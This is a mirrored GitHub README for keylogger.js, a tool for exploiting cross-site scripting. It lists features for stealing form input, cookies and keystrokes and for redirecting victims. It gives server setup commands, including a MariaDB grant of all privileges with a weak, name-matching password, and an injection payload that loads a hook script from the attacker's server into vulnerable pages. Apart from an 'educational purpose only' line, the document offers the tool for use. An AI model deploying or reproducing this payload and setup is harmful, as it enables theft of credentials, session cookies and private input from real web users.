Coder Social home page Coder Social logo

chertogun / keylogger.js Goto Github PK

View Code? Open in Web Editor NEW

This project forked from sharpforce/xss-exploitation-tool

0.0 0.0 0.0 2.08 MB

A JS keylogger to exploit XSS

License: GNU General Public License v3.0

PHP 95.42% CSS 0.15% Hack 0.24% JavaScript 4.19%

keylogger.js's Introduction

keylogger.js

A JS keylogger to exploit XSS

This tool is only for educational purpose, do not use it against real environment

Functionnalities

  • Exfiltrate input field data
  • Exfiltrate cookies
  • Keylogging
  • Display alert box
  • Redirect user

Install

You may need Apache + Mysq + PHP (+ php-curl)

# apt-get install apache2 mysql-server php php-mysql php-curl

Pull the keylogger source code:

git clone https://github.com/Sharpforce/keylogger.js.git
mv /var/www/html/keylogger/* ./

Init the database

# mysql -u root

Creating a new user with specific rights:

MariaDB [(none)]> grant all on *.* to keylogger@localhost identified by 'keylogger';
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> quit
Bye

Creating the database (will result in an empty page):

Visit the page http://ip/reset_database.php

Exploit JS

The file hook.js is a hook. You need to replace the ip address in the first line with the keylogger.js server ip address:

var address = "your server ip";

Insert the hook in your XSS payload:

?vulnerable_param=<script src="http://your_server_ip/hook.js"/>

Then, the keylogger server should list hooked browsers:

image-20200214110103913

Demo

Welcome page / Hooked browser

Steal cookies

Keylogger

keylogger.js's People

Contributors

sharpforce avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.